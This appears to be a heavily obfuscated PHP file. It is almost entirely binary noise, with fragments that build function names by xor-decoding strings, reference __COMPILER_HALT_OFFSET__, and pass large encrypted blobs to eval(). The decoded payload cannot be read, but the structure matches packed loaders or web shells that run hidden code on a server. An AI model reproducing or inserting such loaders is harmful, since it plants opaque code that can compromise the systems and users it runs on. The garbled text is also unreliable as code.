��𔶦�����ԫ�����Ǫ�ƾÿ � �������ے���� ���ϐ� � ��������ݘ����������������� �ޒ����������ŤǦ��������ܕ������ܳ����ܧ�ܕ����҅�Ÿﶗ�����ԁ�乓�������ɉ������"}=_͐��(";�N�g�G�%��")xor/*c�*/${"g�̅��Ϧą���������ӕ� ������ڝ�����ڪ����А�͹�ݠ�́���������Ծ�� �������ǭ�����Է��̏���˫������Յ�ۅ����� �߶�����������佇�ڬ������׆�Р����� � �҂��������� �����ت� �ԅ���������� ����ҹ�������������׽����󋃘��Ϸ̻ꌌ�� ک���ޔ�� ޙ��ڮ�ʸ������ ���ןڎ������Ȃ�ӧ�ʽ�����ܸ�������������Һ����� ������ѿ������������������ ���ƣ��˻��� �à���ɝ���������� ���ٓ����򻄧��������� ��漕��܉���ν����������ȹ��������仡������������ՠ���� �Ë������ ����������������ŧ������׵�ɡ󏊜葂�ػ��� ���������������� ����������¡��ƁҊɦ�����������������Ǘ�������Ó������錍���Ҭ���� ����Ĕ��˵�� �ò����ڇ���������ܢ����Ѳ���������ե�� ����𫌋�������������􋐤����Ȩ�����䮵��ߩ�� �Ó���������� ˮ�� �����鼈����������꡸�������� 񖳞�����є�����Ǯ����½���������� ���"}=_͐��("E�x�^���h�ҿ�")xor/*c�*/${"0� ����끑�� �� ���τ��͋�����������В� ��������������ڥ톙�����᪺������ ���������Ղ��º��"}=_͐��("v\"�.@;�;h�")xor/*c�*/${"h���ܵ�������í���غ�Ȑ����Ƭ����������ü� ǔ���������Ո�Ν����ᵌ�� ������������ܮ������ց�������颈ˢ��ֈ�����ф���������������޾��������ڃ������א�������������������˖��ܶ�غ��Ǻ�൶���Ǝ������� ��� ���ۙ� ���������� �����������֌ԣ�ƒ�����э����ş�����۫����𔴳�������� �ʧ�ĸ�ն��������Ҙ��� ������������ ������Է�� �����������������������������瑒�������Ĝ�� ��Ǖ� � �� ���������ʦ�� �����������䥻���Ũ���ݘ������Ԧ���� �����ċ��𭂯���� ����븜ﵥ����ƤÂټ���� ����Ɛ��������󯗱���������������Ġ����� �������ǿѢ�紒�����������ڙ�����Ҟ�������⒣�����������ך�������ɼ���ʀ��� 됼��������� ��қ���������ǟ���������������������|�� ��Ǭ�ҏ���ރ��‡�� �� ����䠻�������������Ɇ�� � ����������˙�����ɫ�����̉����󸃘�������� ���ᅲ�����������"}=_͐��("� �n��B�!5[�A㣉�л�&�")xor/*c�*//*�c*/$�������=__COMPILER_HALT_OFFSET__ xor/*�c*/eval(_͐��("5�f�K�>�P+�� ]�G��K<(�.�6m[w����-�Ž��Q�%ϖ[N.����-�>���\"L\\�?�e��\"�6N|�.��)�5�R� CB��79s�x��mD�A�f�^�\"E/��Q7*x B�w�r�!���y��mh]Q�!�j���MR����V�Z �H>�<--��S2#P�c �?�a��GJ#�}x���@� ‹`ǜ�2c k���:��\"V���� �z��!�B��� �]u�Q?��j�櫸Z��轪�6j�H��� V��.z�>�*��g?��;�q���3qM ��+��Zwm`��C��ؼ �:�\"�Pp���>�35����}a�� �p7�&o.^�!>�,E��}�ލd���Y'/ŚKs�@2*r*.�k�S DBO�=�;��l��.(�VȌ���2DIƎ�� �r��Z�(M5���ˈ�F��Òn� �8�u�]�4������8�B �ԕ�j�M��!�ɢCb~+`���=�nM�����]�� �,5� ������>�&`�\"�B^��zw��C��W���}!�T+d�P͞�s����G�n�`����>��㇮}�W�Q�Ir� \\<`����d��+1m��#�n��*��I�d)�W�B}Cݷ���<���V���+Q���}�Ѓ��y��j�K��Cj�WWƈ�M��]��I�a-��砮�@��`b�@&U��h�_�!:��\\z�R���5:i�=|�;��W����87���* �v� �K�'k6�s��5� ��l�#�s[, �X�ܓ���;�FN��~t�a/׼���Kʩ`]�%�5���V�XiI� ns�SJ�2�N�_v3�� �f�f*�Ú�p�A������C��o�7�S��s9�jb�z�;�Qآ��(� #�����n��LP&���5��-�EE @~���iD{�kb�M�S����D��{�-Y� ����Id �y��Ȋ��� 5�-6��T�\"Y�b���bt��w-8���L��\$�/x�8#� �R��TL#\\c+�,�87XT�7h\"�&���:���XP7~\"S�r(_u�D���^���YjD�8*V2�W-d��r���{�O�U��q׶�h��fRu�Sp6�� ߸�b�񼒿b�'jG#t�53hh?6�����v6������` 3~>,Q�a _+�,�He�DF�)�_���\\\\ ��9վd5&��bs��Tk�Ӷ��ZG�4��Oi[4}�ֽ�0I6ԧ4u)��J��F�f�qb͚j��h���sm���k;�aoj�(WP,�VV�O1Z�]ԟ���E\"/�\" ��D]P�g�AH� s�r)��J��7��� ��*a�=+����8��}� �|��F��Hz�6��%5�#��+��d�8\$PCx�l�L<岖�Es� �E��m��0  ; �h�>�0h[Ee��`�x����-G�)!e����Os���%�����8:�ߧ@�,H<� �wa��T��Œ&���N�%�X����r'�iV�W�A '��d��V��Rx_/,r:�'�ײ3w� ��Cs�<�Y�.J~}t����������\\w#e�� �?i]��vn���Put.�� |�0/�!��b� ;@u��Fq�*�—'���ֲ��t�_IJ����}(�����<#�-\$;����Pb�S��y;4Q�95����xG\\Y�k7�P�(��i���.��ӵt��W�ڹ�-�[�\\�υH�Y�&B���B��� ��l��ڷ��O�P�E�{� q�5�:v�� ��ӥ�*��'�I*?/����l��I}��QCf��6�'W6�5��k��ܢ�G�>��'H�kh��@L���A-' ݣi�V-G�Tm�hH6H�\$� ���Y0��_G�*P�� ���#�ub���u���/[G��o����=;(mV�� 7��e�̭���14T�ɀ�-���T�*�M-y��eguw�y^��<9�a��ca�B)Ύ�Ƹ �M�oP�]�K������Tnh�b�|����x� R�y8���I՗�#)� ��w��ĈvL* hX�I��Oժj�U�d{�ț �%N�@� �MK%�C�n��Vwh��V��K�-د��q�i3��{:�U��z��#���8�́ѹ{�P�v�>\\�nx�O[{Jay��z7�Q�܁:���i��#j�M�V0�C����Y����A�'t�rF��ؒ���&O�ٱ�(D_���^��h1;\$�� �(��&���i�Z���|㶹��S��v�:Xn� �H����IG�d��FGBE�«�3K�g{�R���rN�k����i��h�\"�52�N����):S�7�� �7�!��h�FC�F1޳����F�5:��=�%�hN���П ��BZ�Q1���)r����P��V|�1f�1R� �����@,~I{ NW[�R���h ��K[w�yJ���ܰTw��۳;x�����n�2��WE[ж�:���rr������>C��(D)t�1�H��M�̱d`�����8����_t��j\\sN��_ma��.�e�~@���>�&x�,9��,�T�+�(��.JU���ֺty��>8VK-�I����/� �,p�U��yS�: �R�x3l�3���/�f��I��91��na�����4�,3��FT9z=�9��\"����h���*LMxe(|�:�g��z-�<4Ї���Ro�w�� ��5sDZ#ݻ��G\\� ��E��WN�h����.0��iB��ǭ���cI�<��2�[^��Ɯ�m!f��Ɲ�wK>�]�-C�!1���`ԝ}%�<�;�k�G�5�N�Bs��������W��#�m���-L\"g��}6n��F�j\"�4�����%4Z��y �y�󜏡 �:�j'���s�0D'.�o���۫��|��3�tli����+��oA��Mњt��4�<�laxܥ�l�kS0��37���OEm�f� ���8�\"!.���9.�M�Yc��i���o&��`�t���!�)�'B�^>���̣rQǜjцd�3��v�>9�(qÖ�� ��#@�t!��Y(53`5����ؔ�i�+��^�hCh{��pB���H���M 7�,K�q�o�b�%*d~�ω��h�q���q/z���Uu�����9o˹��RLg[E\\�W�;����#�ń���+��HD2�r�q1��`��No�1V�wq8��\\ LE,�#W |M����Y����=��'�� ���{�25���ɖ0��5� �PD{�e����2�{��.��TyX8�tzxMwDu&�(Af�!�𔐰����j�_��F���ʜ�Ջ-�*�5�1�d��1� ���u�߂� �):<���;eK�&\"&�32���W�25YU�H����x�ģ��\$��_�()��3\\�؞�QA��\"dHb\"����C�(��7�-K�n�9�,��[�O4&&�6�B�8�#>h:3Sc����Sh4~�~G ���E5C\" �!��BN��;�A ��qa ��)��*`����w^�����V���>��z�hH: �Zj)���*钴���v>� (vS���N��=�n�DE������d�!�B�Gr��l%~�Z�Lօ�?+�G�3�9>�]�+D�A�X��e�|\" �� N��j��J@'��5��i8{�� � �C���K��NICi�+-��vSڐ��l�O����>���.�]|� .v^��mrm��pb�?���e��~�cr�f �F�&<����!V�ص@��`}�A��e{mv�j���?bi��.�������h́�6S#���~v�9~5ܞ_��R�L�O���K���6�.\",�H�V�����E]fD��� ���9�C�p��;r�þU�#X�;�`��ƭ��0�u�1 �y���>&O��\\�w\\�{��a=M-!x75� � ك�P79���L�r��؄��9�*S�&a�ǞZ}ѩ\"_ 0ؙ�L�]� ����B67�1.��3K� �J�D��5���� ��.W]��G�e�(��<����#�7v ;�4(��?z�&C�H7�KZ��1�ؠ�����%�[-��of�ɽp8�:�\$��Em�|�h�J\\�Նl�ߖ� 0㼼�u%�Vޝ_�>�����@ub�Y3���:�.�A3,��!7~�.qd���UE5�@,}��:{�d�l� �SQB�U���k��7\\���b�F�wJ ���&:}��搚'��x���\"J����ڵ�Xϊ�d0�۔��rge�]���B�˧�� �k� 5�Z\"�Xm)��釈x%�����������- � 5B��ֺ� �G�������8��_N��YO.��鍲{M�����?ljg�o#�!�!P���ne�7h�-�C:s ��o�SB�ҋ�̙�^I�0��C�������{5z�:��ڼ������lj7��.�=ckZ�x�����^e�~����:�:Ɋjm�aKn��v�U9JX�B��G�>(�����:w b�;��N�p��m��\".+M#��S�?C�ݶ��g ��� }�+�O\$�kwr.Y�)d���\$�)ܷ�[��0Y4��0�O��'z(�X�}`g�CE�\$�CZc�δ��y= #�]��a� 0Y vz{,�ڎ-~E����쁤.}� x��zNx�M?�X�ԕ�\\�qj�A�)�g*Y��t�9^��ׅU�\\���!��R�(��U�,�5,�5����l9XM�b9��>�J*0����\\`/��b/Q� }��m�ƽ�h+����G�=�^ݫb�MIp��sTO� Ŷ-#��8�|��%v9깾��N� mG���k[ōÀ���i8��ޙ�+j���� 4�׍0�����w� Mqo���̓��h�o��w���_�ub�'��t4�Nf9����wu���&�ߕ`n�3 \"gt��n)�l�� '���~��C�؄�Ц���G��4�c-��,���Z j�C,��j:^�mw巅�G���}X�˶�C��3#6 � ����hWr�QZ�?< ���N�� Nx��1�'���H`G�j;�V�4Ԅ�|}/auN��ڍ:��aG{8p wMx��Z�&�#��9t]�^Ċ�p��0< �)U��n�K�{G�b �~����D�i��>�anSK9bn��� 5oE�/����t洦{ &Db胬��R�� T��NI�‡򖪰�5; o�~�F����\$� �gw�`\"06���� /�����y�)I ���7[%OUsV�����{��y�x��ܬ(|�� 5˶#���(8ΌdC����0j��!t���I�*_ݯ;MP��M�� ��s�j�e�A� 7��c��E�7J6�Q�'��-[b��1���\\�'B�ǽy �2ž6��v��2U��~B2q�B�\$d����S�R���.��9�Jɨ߮\"�b�����X��m>�/����d��0�EG���@���� QV���ľ�O��_��{�.��ו�GK���8pH;k���l��\\Ca��Ij�?c��<�Xm��J��t񃞈u`�~�-��?�ͬ��؋lT�cVi<)�F�b��� � � w����o�@���� � �\"����X�8/�'5���G*1�Zu�K�� ߭l�� �h�/d���ec?�:�„“�vm3w�,<��}�i [hR�R�S��%�\"p��jC�!���)Z����^�J�|dQsR�u��o�\"�T���vn�>��y����kx�V�ή�z��c�/��؉O+���B_�JWa� R��UQ�Е�����j\"9���~���Wa���X�KW���5I�gy��O�WT��!Y��|aB���rI��c9����֚×���2Ť/&Fp뎳���h�=,17G���Fkg;]B`7�d�G���� ��ӄ��ꎝX �Cjz@K�p �?�ʱͯ���s 6��?�O~OW��ݤ 9_]Y�O���h�(��v�� � �O���T��K����l3����h]9���Ց��;X�״A#�j{�>`�S}I�� YX�0'�8hq�d�J�X�]M�~����p�(���/��o�+�){�Y�1c�)tt�]!4[��i�_K�m�i^36Y��Z��FHÔ�^��p�d��N?ԙ\"��ޫ��/n�JT�/&O@������2ϻE���Ɇ�����r����� {��K�U�V�<��k�u6��Д{b�k-��Lm9Y;(��uSF|I�l����*������Fj8S���[.�������R�>8���\"pߧP�WF2a���h����l�<��M�id�%�B *�K! W&ca_�< ��D`8��'2;)&h�R,nZ��v{@���kJ/���d.��?}�:�ND��\"�lN-�9W�*F:F0u���]�B�m��Y��F�^a������)���L �8�l��4����M�C�H�� }ĠA�)qF:n�U���-��!Vv��R�U����J2��M��@W��WQ�N����,����Q�櫅.����#ᑪu5�@�+㘽��}��d���v�͹P���K-�N�X�3��r?ߏW���;�����*/��g���*h�I]q7��-���O���D"))xor/*�c*/eval(_͐��("�S�\"��\\�w�Il� ���Jz�� �Fٷu�(��^}��h�9cN�� ��6��U ޻�U��H��f����SϹ �xij�����~H!�S����*�\$J�9���28X��c� � �~/E ��I��5x_��5;��?�{��\"Vz�\$_�7D� �k�1��Ycf����f�޷�f�KL(qo���+���zE߅�[�ܷ��Z�:�c���;�@�WV3U�/�L���K�*>��VY�Ҽ���#|+Y!�(�� N7W��<�!��nsͽu��%��)�}2Ȁ+�v5&w�lѤ�0�}L,��m���4`&�U͠��C\$T`��Ƹv �}�k��fX*�����텹'�v� �y^V ����&��]�򣙢[��vx,(G{K:�Ȓ�mX7�.\$!�q!����*p�:��L��50� E���U!���V��SK��N��FvV0rjY>�`8�d��UKJ�j.����,�Ř�u�9\\�����H�.�̕��1/S^@=�5��ǩ��D��7��C�� O��V����Sh��W���@��d�)`�x�i�Ȓ YPa������ед� �\$�z;�=�^��[~�z� ��J��p�~o�m�� ��N\",}��qi �6q�^���uȯNB2�0T�V#���V)}��)�������xs�t��.�1K+H�Zv�䛫��#�9G�*��g��R��0�+3��H�Up �s�<�c�y&-�*�� n !��f��ma���B´+hi% �!�J�}�����4��}�P���UR���1U\\��^��R��f��kf.R�������Zc�4~R�;��k,gl�5��)9MX���Q�Kg�y�X2��Y��! �\$�}uk蓥��F� &��A�-�Y� ��B�X�L! d-/��hG�7�km��*G^��!�2�Z~N`4Ly^�Y ��p{Qk�^k�G�,.�#A���Q't��7V+�Ք��PxoZC{O��Η|��oqa��jba��o�\"��~o�r��!sz�\"�U�Gr�c��~ծ������Q��>V^��e�}m���`r�\\��5�gy��w��� >��Zo[�cKe��ZC-�)�1+&a�*�'.g�O�S��2Z^�?�t�08�t˒=�����9+V��~rHGI����K��5JH�|�Eq��xv&��h3���Ҁ���9�h�c��8�C����K�DZd!��G-K�U��!�Y�>� ��!�,� �]޵p{G���BjA�:��|���n� ?FdJl�}�M�TO6<h�=��7SkS�� �ӫ�W�ھ�h�bF�� Qf���l� �԰�=�l���ӝO����U�f�d ج7�G��?�0z��5\"��Dy�%K���6Hk�K���h���Y�fS�1�e �^`�����tN1���↯[��Pe8��ݗ�f�m��Y�A� �����Ƈb͌�Si'�;��bi�(��b�ݯ��,y��9'&���8��X��O�[rB����Ȑ+b�H��x�!) �3g\"'��I�4�Z/>�E m43ɳ.\\�b\",�ݔ���S~GU�DZ=��u��J�Y��|s�2���#�p!�!\\I[TN���JF.�v�l���3��Sw�6t� ���|P�e��� �P�7�/�d���)�jw�3�MJ��\$��#�E����N��]��-=r����Á(e/��ȥ�e9�a6K�����.W |���P��q�3X-�V�p�@d k 棍��D�U�~������7����w�5%\"Td�Ƣ9�v�P� a���om��t���P�L{�j�ū� �h;K��ǍG�y\$*-���Q�d�#��-�H�)α�,G,�q�a�zWX����C�4�׽�r@ u�%iզ�� �_U��V Kce�3㯍�` #?OҚ���������/��ݥoxF�[J�w�� P�<��]�B���MYZ4��Z����Aw�?Q_��s��&���/�8WR=�g��5j��Wa2��*�� ��x�6�?���u[5ʾ3�}��{�p� �ۢ�1�]�O u��Bܨ( X ���X��ya�f���o�vW�\$,q.�Z���Z�[��&P^��<�P�g��a����m�_��jA����2��E�d�-\$����ľ��F�[��55У��Xhy���X� ���j�MAq[*m�i�A�Fz�=s� �ͪ�=�b=�7.֌~ )�@��BpdN9��pK��SHYtx+��j��Y\"1��V�:*���?7zD�@�C��}�djym-��XW_�{�k;��ޏ�{��]��M�P�d&B[�,Eh#��� EK��vV��}�(�� L�>�܏��+���K �n��� (��mb\\I�ƃe8p��r?��w���{��n�t�_H�(*^ѐ�& �Yh8 '>�����6,):u�MĶ��Q�o���*S�a5E)Q�#�w�����2�yZc��l�|�נɚhxS�-3D��3]ϙT �.gӠ�`>/r��H^!ae�\"�Ud`�V(�q13��/�%�?�|8ܛӃ��G^)�1GD���5ۛy�`xu[�Ǧb�}���ڌ�;.K��Kg<� E���936��t�R�8�ؐ���*5�p��Y#S�ez��S3&*�Evf�T�\\��WF��O���r�/��T�,8Jim�y���i�*������)2��n#�����[̵�S0S��~sϒ�v`k�vP�X�>�(���!�̢Ѳ��Z�������I���,nk��w�BD'�� �6:�gy���̜Bz}a�������jy?�p��#XI(�s� �� ���;2�M���]�f��(xo�0�P70���Sdd�� ��?��d 6ؑ�������BU����D!t�����'����號\$DR^C�*E���,�wS1�fL��uGX_��\$�y�;���;��X��g�� |o�]�T�G����K��\$��ՋТ�P��<Ƹջ�2��d����=ٚ'G�� ���/�� 8��a4Y�_PJ�m<>\" <=/�1B� =!EP֡6+C�r�U\"� h�6��#EҸ�̢��% ��7\"����:�b�G:慪�.�R>���S�CVp�0FJR�@~�5y� T����#j��r}��}�%�+��a�F\$�k d��+ A �3�4��,��D� �1a\\.�fᏘ����.y�9^������վx^�'�+�W��*�G��ʥs�Hv�ѡ��c��hurw��`����]��\$��]�I��ByV� r�_�2�v�OӦ�}��d�xB�{ؒ��[ ��S`�럘�oW��a\$�,*7p�-fDa�ꄹ=Ł L*�Ϳ�S��W����5h�P�6�k�ƎZoӪ�j#H�32*�����8F�<��p�I�c\\���Fi����v����z��{k��4Sl�# �<(sxLNm�1(���@���Ύ�=]U ��R�S�(Œ2��+4�9j���O�lgb8 Yw�&R)����=�˞H�0X��'��Х���HE�\"�[�+4��Qk���jN1q�J�[��C�3����;���7���I%G}��|f�`��6A�?#��ښ5��]�vj�F��gK-&5�ef;�ީ�3�fu��'C�.�#��*I�8�M4~��(���Z6�@�~���.��@��}l>�l���K\$WH���?�.@�4��_H�#J�.\\Nj�B����� \$�|U�a�Z���m�� |D����@�-h V��^�j@��\\�Lx�}�2{c�,U�?S��7��Lv��J�_5���#�ZUҚ,�*�Q���~��H4>�ڝ�6����}dD��5F�g�۩��d�6�i%���/�-�Ϡׅ�#�� ��bg���(��A�~\\�N��U����#�/��v��O�]��B�t���b�^?7G�~'���,-?G��2�)-�)|���`\"\"/����~��@�L����x��}w�b(^\$ƞ�+��F[za_����r8���V[�gL�K�� '������0��H�7�Tޮ-�ѝuܹ� ���8Af�b\\i㦍LN)l���VЂ7�Ԏf��{jq�\"(��v�|Y�:n�+N�E N�*�eUr� B�m�{>�a�|Z�6 !>���Y]��ml����h�� ~�1 Օ�yWR�N,sl�<��1��B�� ���,t����1�,�8=B���'MPQC@F���\$%�ؙ�!�y} 7(pe�?��-�NS�O��>��@��VwfӎK�� �dy��w %��A6߼H\" &�ܲ�~�������S�˂#��h/����8(����/�ݔ��b��e;���းv:�&�x|���.��;!!�\"ΏN � �꠽�z �E@���6JFy~�a��/������v�Hb2�=��L��k���; T�\$���@�t����.��� h+d�j8�� �:v|=ůo�H�X�X��h�8P���@#����A�܅���} �6�3F�#jI�v?��Q�D�uJ�z´�ga2�(�9Z1Ϝdh�]��i��Y���p!�`��H���AQ7X,v��1[�� oN \$ H����s����� �N�Sh\\lQz+�.�Ɤ�LZo�ŵ��[��DM浡�X�;ͅ�����e4���s�9elӔ�j������3���>v�˵�������Cr�h�Q N#G��ya?�?&���G��m����aG�uO ��/E}<&S)8ۊ��v�,��U�A�o1��y\"%�9>\"lL ���D����PqO�fܚ�dп�����X���d�%�Ue3j���Ol� ����]j��;�i/�Kq�(��2��(�u��8��E����\$��|#��28ۨ;����Ӷ��!t5yIw��S@\$�]�}�]�pM�1�o���se��%�D��>��B-b���b��{�L����@�z�{�_;9�\$4e�����q�6�Q\"��K�#��A�{*Ɏ0�����*Mj�4�^^�A~��t�n���SڇfL7��r1綩��)D�:T{9U��w��Y2�t���!r��;�~�/ȩD2���Sv��+g8<��<~��D'ІV��z��*�_���E�6��~ݰ�va0�B ���� J��u�r�R&������Z �늆�끍�� 7 �uF�<�j~>�J��%��Ֆ�;���n�O }���暴���c����FQ21]����\\�_�̏�S�� ̦IU��-�ۣk<u�N���,u���^�ǭG�it���H�t*�R��f\\�fpo�<�_[@/��߲c��5��B�H&6iZ�Yu�,c�K*@ݒ(»u����\\��VEX ��\\��(WE' gG�Ds\\v����o����b���}F!��T`}����n�j��`�_mt7�D�2h��bTDTo)jÞ0�\"� �l�x!�Q3���,�_�G�h��ls�Ǟ*pKܳ����fy7���_����1._�w�f�e��S�znKq�� ��R�1+�|L�-��|Ai�m;5L�W�s�V��q�JO� �b(����*R��f��r�?86��N�w^N������(�F�p�Vң�o�x���Z�Y� w�@�8VX�Ѥ;7�,z����耲�,��j�����ek8���I�u:�b��۹\\*Ht��+]�N�I\$X�7�KG���i��m��4 �wF�;ayhT���G�h�������^S�l���NN)�F7�˗ON��M�_���D`��i�v%c�O8�HI%�H�jH�L���z�rӭΤ<ۍ�\\�G��\$�Sp �h�L� mloQ�R^����ȼ�x�xh���z�S@��u��fp�xqH��������|\\�9�|���÷_ 2��b��x��w��F s��bk �l�m*��/�>��@��3cO\$�ٌ:�@� tDN�V�9�ɍ\$�?�o��_��S��f��F�p]]��K��b9�| �ڌ�R��=��kɇw�X�,-�Ƹ����O� �%c��A�����^e��LoUvB��ʼ;���~����0�̪�Rhr�FV�~�.�I2sm\\P��Ϡh ������M����3 w�(�`��\"��J�^{qӴ�0+r��h����rAs�7�%���� �l@@�t�f[���� ���Ln�{od�I�g��bt���r4�% g m�5�q90�NTl���T���p3�1�h-����ާ{ �԰�+���vZ�M���BY�>�jb��\\~�zd��C����a(\$�}^4�y!;�8䏻�چ��6.�y���Oz���_���V���=��D�C�&�06H�Z� ��K�� }r9�l�7�#�/�ި�a����Unj� ���WQ/�����x�۟RM%�,9�!D�ê�l!k��f�Z�*_�:i��uDrB��@��9��/�wA 0e��v�]�(�|8 L���`n�™j �7�Rx\"tWK��P�v6&�G�*�\\1���J6�E�fQ# �:slt�k+ r.zft���1���=X ����ǹ��,#m����đ�_0�bB���v����{,s~��{��q2��q����8��e��r�q��)xE΁XF�F?�iw�kK �y�g1�&6��{_|�fV1_Y3����3 �F�C�2dYSVG\"�`��E�A0|M. ��ǒ��+�h�2�[\"Z����>�P�\\������j�SѢ�:�g��4����� �/w��ٛ`6�#��!��%W������t�Q��J9T�,S/��#�8��;�XJ�/����1������`�P��sh� �s ��c�o:H1y)(w�h�n� �6�@���ˇ�/kz��3{�ߛ�H��G� �Q��۶:�R����kV��;}a\\ �5�K�q p �'��LT�! yR��z�,�gZ�C��[� wxg�5O<���Ξ �o\$�sY���~2�J��� ����F\$K��Љ�[�+�O-��x� �܍�0!���\"YF5h�}io3qI�}E^�XqOݐ��{D���n�Р���L��+F�,G̘Ѳ�A2\\\\������ĕU=SH�త|xc�#�Vf�};���Q� ��A˷�l��S4��1ծҌ�MI͋K�7�y�6�M*\"c� N�D%,�c��P%�Q���W2\$NI�MYà�PM��� ]-,D�}Ә���&�# ����[�}֪Cq��m� ��C�V�qt���yy��L�IF�7��+d��^c��\"�:3T_�z*�-����s�����R.S�qs�{ԡF�Z�+�����}�ؔ,W�%�X|L�s( ���4�7�`�UIQ�_⿁Ɏq2��sƟ���w]����W䬹{%q��� ���8l��gJ�b��/�|Ύ<�c�ǁH7��D��0��e��Ʃ�7L@���M�{���Ț�/4�3����~q���F�zS�O^��ا^�u�Qw���I4����_�b�f:��9�a��Q�����7��@+E �����ƕc�rM��3�Y���qkB�nB��9E��(Z>2 ��9.*J�0w���{�H ���˰s��r��{�;a���br�1Qs(�^��Gj��h��P�� =�\"�u�s���f2ћ��;?�����It�ѻ~NF�:�]Sw[���d���a�[-���}��*�u�s& 2S#/r4;�~{�a ��q�<}<Ҥ�x z�%{6�%��,Р��� �����x� �^�X��͖� �%�`X����5M6�-����雲Z��*���е��v��Op7R��燪VS���,�e��R<l��&�5 yط�簓�f����/)�A?�n�q��)�B�RQ�7�{��,AƘ}�=΢�kP�Fs�� ����e��n��f((~L�@D �_�(��a��b����F;�� ��~k�e�j�Op�a��Hő�~�H��ް�<Үi a�a��u? �S�v�,���:5Aɍ��nڎ�����o��1YEB�S+gF��N�6aR9�茦�L�^`�e�r� m� ّw)��PHeP�[��I���P�C�!�i��1[���y�5�a�h��=V3؛q_R�!K���&��\\��ё9��=扟�N�nP�Xo���I�&�û��t��JO � 9c�Gf)~n���p�Ŧ\$՘��g�P-Y�z=�V�q�#2���:r�C������38���%>���g ����<�W�����n��F st�� ��\"�~��F?�<\$���\$���% �FZ^a���!W�d���a��3b]LyWA'�\"�t�?ՙU���d��ϗ(�*X�����/[�X�,^�F�� �F�)5���_*�cY��Ѳ[���?�]�ލ���ߔ,���r��L���ϴ7�6Eg�Y��������g�-��N�LPi E��H��'�1k�h�4��R�� -s1����^>9vۺ�;V��0J����F^�¦'5�D�{����&���%w�࠮L�E��c�yb���S��b:��H��,�2��厰�9vD���`1�%7Byxd�;��&uɘs��*-#�JYE�'�G�?�i�#�I�6C6�lV�!����ǹ�d%0��a޳����l�X�xUc�kW��M�}��������d��e����V�ur`��_|��k Ӆ� l�yXh�\$��WU��A_A���Dc^�z�;��R>EV8�O�ТvW*���+�O,ͅ�Ť��·���4Q�k�ޟ�J�����Q`>'&���w� ��h'q�^TT �EmE~e���T���̃��-s��=���Z�em�^h� ��!�^q�h�H*-s��p�]�|��_�ӝg&��<�L�lV�s&N��G����\"�j�_x�u\$Iߘ�n�>H#b\$�K?��yb���w�ׄz�=WYk��� ����n� �y� �rh����Oh���\$���XΊp>�����I��dQV�Z�𲤅p@���/�B*/L�R�:Zkz��otonN�uG Anx7��s�%/��������L��6m�Y\"���K�۝M�ڏ�s��1鸩��sս�2J);�S䏼A@��6Dm֗��j�dv��/u��^�p�_��@0�_^��Y��>�9��=[�n2���-d�\"o�� j@�j|����h-e=�4��^p�}^�L�B=u���\"���@��a�p� ����pW�MN���QEhM�Dt}�_�s�IZ�ӈ�L�&���rn�Ĕ�3w��V���By�b`!���#~���h��|]��2���+[%WKrgB��z��N�̇L��9U�C&�flt���e���'�s��1q�5EL-��U�j����)wbB��� �f��W�x#�SXqB���i������ jŻ ����{��G;@� �tj6��H�U����JN��AN&‹ch�N�@��9�W�R���h��l��,�ZWX�qZ1Ͷ|��߻mpE��)��(4؞!\"�OV��ȃ�J�R�|�]���LQ�P�����N�_j_�àK:h���6I�\$���+*�4�L��R�P�����H3%��n+�N�i���7�>0�R�\\��L,� ���<[��ߋ(lb\$����?�7�_D�͆3����}�h������x� ^�gv�=�3�z�\$�C��^���>}�_;p\\�ƯT��ܯY㍨m }U�\"J��<�40�pny�p�lq�\$Acv��L?����j�~b�x\"�6%En�ӎ� ���8–wo��שaF^��Ԯ�c���V��y((=��M;ym%�Ӌ��o�V~iR\"��q�qެ�3N|�a�3s�!w�TS�o���=?����4.�v�����=aQ�^�|�G��� e;Z�Th������G�z��`Axg;�5W�y�������\\��;{_^�|3�7O�yv�Ҡ�O��7��ұ-��v9ǺJ��)��� 5A{�E��hR�I ��Y�xコ �ߺ�vA%�:m_�'��pS��Ѣ؟�)�2zM�'Iȏ�� l}F Djp�{��b[� B�ɇ�S �^������X��q���j�\"�\"?���� T�T������ t�ݲ~7�uN� �SԴH/#�����v�,��6f8Eϕ�.�@�3gv̫GN��+!cӃ��ne�)���s�:�f+C�S�ϳp���h-7�V�;[��c<�Jɟ��.)�ٱ�zFfk(S�\\7K,iq�g��-IlX�K.Q�����Yp直>p�%����� #�q�^WI�wR8Y�z*�ς��;4 *(���ֲ#�['�� ���a�z�g��/�|�� ]�x8j���np1�(��h�t��o���W`� à��_�&K\$p�l���\"�� ����U�|E�'���,��#�S�����2 FX�ӴD��;�O��;� #7���Hx(X�ǁRj��ǵ���ɻ��\$�����b�[C�2���&� �u�0� �++y��u<�i�P�7�4��H'�x���/\\�}���Di�nT����K3��oy�9b.0��CB=U}Ͽ-��Y���渲':�c�q~��9HV��.��d�Jdy�<�9+(��'�O�ta���G�m�Ԕ��-�_�̦��� ��&�v϶�h�����_�0݌��=h~ʾl?f�p�{��_�-��^���?�+��߾��X�И8� �]4H��A�*�,RJ��*^�Cߗ&�V��Ԧͭ)(b��[j^���K`Vp�Lq�d��cXW��}��w�x�@5��P�BX%���p�Hw���ejG� �4,_��:ﱾ�:��Du��� ����.�s��4,�%�G���æ��CƁ5^��Jxׅ4�R��Bl�c�F 9;n�E�ǺB�P��F�-���n�\$�u�D�B�=� >2pyV���*LJ{S�}gHD�~eZɀ��6�w)�'�s��#�\"��)�� ��-'S)�Uz�m1�N;� �r v�������H����U�S)���*�a�C� �G^����Э%�7J�?'[��ԒJn�8��ǔ8E?�g�E�{^%����d��J��?7�f���N\"�d�O�c�U00��e��w���Ӈ o+�!�t'��� Y[�E����+���ێz�QP&����~��Z�yg+��Do{<�Q�V�C���'P��ŵ�B��%�4��8i��q�phs9EbE���¢)���r�H��,���;��+\$�OPՍ�Hb������ �KK՞�PG���IQ�G�,9�A�/� �����rͿާ���Q�9#�(�8�%PK��{�qU�~��MBL���im�\\���3-W��*�=ؘKJ��Q4��4�5] #zl?�/��� �s2���(u�\$@��t��V������T ���|�d58��}�eS��Py 1v'�����E�L����Ś�}-S�5?�P9� /��+��P)Js�4�\\��wg�� ��_��i�h�0��6n���-�jg5�(4�3ٱ�������Z.^Q��C��~���=Z��<����\"�8����\\?*[���QL���ѣ*ae�WS��� MJ�я� 5�+��>\\D� ���WG?5l��/PԤ5�/6���(�e����m��Ii�Wkcj�� �9�s��;ʼnic����^���p�z4_� 2X���ķ�z���3aI�ZN ��%�v��ޖ�\"L�@� ��K}��T�?^�΄����E�ޱ��{��v�ƛC�k��>��,����4�{!�����>�sG_�1��D��֪�������6r#�X��� 